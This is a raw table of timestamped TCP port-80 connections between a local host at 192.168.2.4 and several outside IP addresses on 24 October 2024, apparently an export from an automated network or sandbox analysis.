                                                                                                                                  Oct 24, 2024 08:02:21.220937014 CEST4985180192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:21.226891041 CEST80498513.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:21.227005959 CEST4985180192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:21.235765934 CEST4985180192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:21.241194010 CEST80498513.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:21.861932993 CEST80498513.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:21.862663031 CEST80498513.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:21.866748095 CEST4985180192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:21.888041019 CEST4985180192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:21.893482924 CEST80498513.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:27.502262115 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:27.507781029 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:27.507878065 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:27.519655943 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:27.525084972 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:28.449692011 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:28.495446920 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:28.626813889 CEST8049881206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:28.627047062 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:29.026745081 CEST4988180192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.049271107 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.054713964 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:30.054914951 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.067886114 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:30.073398113 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:30.985322952 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:31.026602983 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:31.153613091 CEST8049893206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:31.154504061 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:31.573765039 CEST4989380192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.593151093 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.598915100 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.599013090 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.610771894 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:32.616338968 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616370916 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616399050 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616425037 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616486073 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616513968 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616540909 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616568089 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:32.616596937 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:33.537017107 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:33.589133978 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:33.715413094 CEST8049909206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:33.715490103 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:34.120465040 CEST4990980192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.140384912 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.145762920 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:35.145849943 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.155971050 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:35.161298990 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:36.082832098 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:36.136007071 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:36.258321047 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:36.258644104 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:36.261162043 CEST4992280192.168.2.4206.119.82.134
                                                                                                                                  Oct 24, 2024 08:02:36.266571045 CEST8049922206.119.82.134192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:41.281990051 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:41.287429094 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:41.287494898 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:41.300297022 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:41.305671930 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:42.002927065 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:42.040544987 CEST8049956162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:42.042624950 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:42.810456038 CEST4995680192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.827537060 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.833923101 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:43.833997011 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.846467972 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:43.853462934 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:44.565080881 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:44.603630066 CEST8049967162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:44.605479002 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:45.354839087 CEST4996780192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:46.374455929 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:47.102833986 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.102910042 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:47.123435974 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:47.129962921 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130002975 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130017042 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130053043 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130067110 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130083084 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130199909 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130213976 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.130225897 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.805632114 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.846934080 CEST8049978162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:47.847054005 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:48.638459921 CEST4997880192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.655170918 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.660763025 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:49.660908937 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.668462038 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:49.673798084 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:50.352365971 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:50.390518904 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:50.391000032 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:50.392036915 CEST4999480192.168.2.4162.213.249.216
                                                                                                                                  Oct 24, 2024 08:02:50.397464991 CEST8049994162.213.249.216192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:55.429107904 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:55.434480906 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:55.434554100 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:55.446274996 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:55.451734066 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:56.273010015 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:56.395911932 CEST8050024217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:56.397433043 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:56.949114084 CEST5002480192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.968298912 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.974349022 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:57.975202084 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.987793922 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:57.993288040 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:58.821497917 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:58.870385885 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:58.943512917 CEST8050025217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:58.943578959 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:02:59.496263981 CEST5002580192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.518460035 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.525326967 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.525430918 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.537065983 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:00.544193983 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544208050 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544231892 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544245005 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.544255972 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545854092 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545866966 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545891047 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:00.545902967 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:01.385833025 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:01.433059931 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:01.508840084 CEST8050026217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:01.508924007 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:02.209809065 CEST5002680192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.220694065 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.227174044 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:03.227253914 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.236032009 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:03.241432905 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:04.071456909 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:04.071521044 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:04.071657896 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:04.195100069 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:04.195292950 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:04.196506023 CEST5002780192.168.2.4217.160.0.231
                                                                                                                                  Oct 24, 2024 08:03:04.202083111 CEST8050027217.160.0.231192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:09.820111036 CEST5002880192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:09.825890064 CEST805002854.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:09.826097012 CEST5002880192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:09.837869883 CEST5002880192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:09.843565941 CEST805002854.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:10.833158016 CEST805002854.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:10.911968946 CEST5002880192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:11.038039923 CEST805002854.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:11.038105965 CEST5002880192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:11.339248896 CEST5002880192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:12.359049082 CEST5002980192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:12.365149021 CEST805002954.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:12.368618965 CEST5002980192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:12.380589962 CEST5002980192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:12.386389017 CEST805002954.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:13.393605947 CEST805002954.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:13.448530912 CEST5002980192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:13.595442057 CEST805002954.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:13.595515966 CEST5002980192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:13.913564920 CEST5002980192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:14.920716047 CEST5003080192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:15.682512999 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.682622910 CEST5003080192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:15.692692995 CEST5003080192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:15.700335979 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.700378895 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.700408936 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.700437069 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.700469971 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.701549053 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.701622963 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.701653004 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:15.701679945 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:16.687108040 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:16.745452881 CEST5003080192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:16.897763014 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:16.901345968 CEST5003080192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:17.076153040 CEST805003054.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:17.076210022 CEST5003080192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:17.198626041 CEST5003080192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:18.217183113 CEST5003180192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:18.222846031 CEST805003154.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:18.225356102 CEST5003180192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:18.232958078 CEST5003180192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:18.238692999 CEST805003154.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:19.222012043 CEST805003154.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:19.276704073 CEST5003180192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:19.422178030 CEST805003154.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:19.422319889 CEST5003180192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:19.423176050 CEST5003180192.168.2.454.179.173.60
                                                                                                                                  Oct 24, 2024 08:03:19.428725004 CEST805003154.179.173.60192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:24.466502905 CEST5003280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:24.472465992 CEST80500323.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:24.472624063 CEST5003280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:24.486469030 CEST5003280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:24.491938114 CEST80500323.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:25.997356892 CEST5003280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:26.003283024 CEST80500323.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:26.003395081 CEST5003280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:27.014930010 CEST5003380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:27.021002054 CEST80500333.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:27.021275043 CEST5003380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:27.035609007 CEST5003380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:27.042114973 CEST80500333.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:27.648040056 CEST80500333.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:27.648221970 CEST5003380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:28.542531967 CEST5003380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:28.548142910 CEST80500333.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:29.561225891 CEST5003480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:30.562563896 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.565207958 CEST5003480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:30.577044010 CEST5003480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:30.752285957 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.752720118 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.752762079 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.752940893 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.753021002 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.753552914 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.753596067 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.753652096 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:30.753679991 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:31.365880013 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:31.365938902 CEST5003480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:32.089186907 CEST5003480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:32.094806910 CEST80500343.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:33.108299971 CEST5003580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:33.114470005 CEST80500353.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:33.114547968 CEST5003580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:33.122854948 CEST5003580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:33.128591061 CEST80500353.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:33.751420021 CEST80500353.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:33.752228022 CEST80500353.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:33.752288103 CEST5003580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:33.754040956 CEST5003580192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:03:33.759900093 CEST80500353.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:47.187112093 CEST5003680192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:47.192909956 CEST8050036156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:47.193105936 CEST5003680192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:47.209918976 CEST5003680192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:47.215379953 CEST8050036156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:48.209170103 CEST8050036156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:48.262622118 CEST5003680192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:48.337796926 CEST8050036156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:48.338016987 CEST5003680192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:48.714338064 CEST5003680192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:49.733314037 CEST5003780192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:49.739242077 CEST8050037156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:49.739327908 CEST5003780192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:49.753036022 CEST5003780192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:49.758816957 CEST8050037156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:50.707211018 CEST8050037156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:50.762469053 CEST5003780192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:50.889626026 CEST8050037156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:50.890552044 CEST5003780192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:51.261121988 CEST5003780192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:52.280987978 CEST5003880192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:52.286920071 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.287023067 CEST5003880192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:52.297502041 CEST5003880192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:52.303178072 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303196907 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303210020 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303237915 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303252935 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303392887 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303406000 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303421974 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:52.303433895 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:53.452917099 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:53.453538895 CEST8050038156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:53.453727961 CEST5003880192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:53.807986021 CEST5003880192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:54.828488111 CEST5003980192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:54.834423065 CEST8050039156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:54.840699911 CEST5003980192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:54.845175982 CEST5003980192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:54.850981951 CEST8050039156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:55.799308062 CEST8050039156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:55.854839087 CEST5003980192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:55.982511044 CEST8050039156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:03:55.984822989 CEST5003980192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:55.985842943 CEST5003980192.168.2.4156.226.22.233
                                                                                                                                  Oct 24, 2024 08:03:55.991158009 CEST8050039156.226.22.233192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:01.198311090 CEST5004080192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:01.204361916 CEST805004052.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:01.204545975 CEST5004080192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:01.215353966 CEST5004080192.168.2.452.20.84.62
                                                                                                                                  Oct 24, 2024 08:04:01.221235991 CEST805004052.20.84.62192.168.2.4
                                                                                                                                  Oct 24, 2024 08:04:01.869029999 CEST805004052.20.84.62192.168.2.4
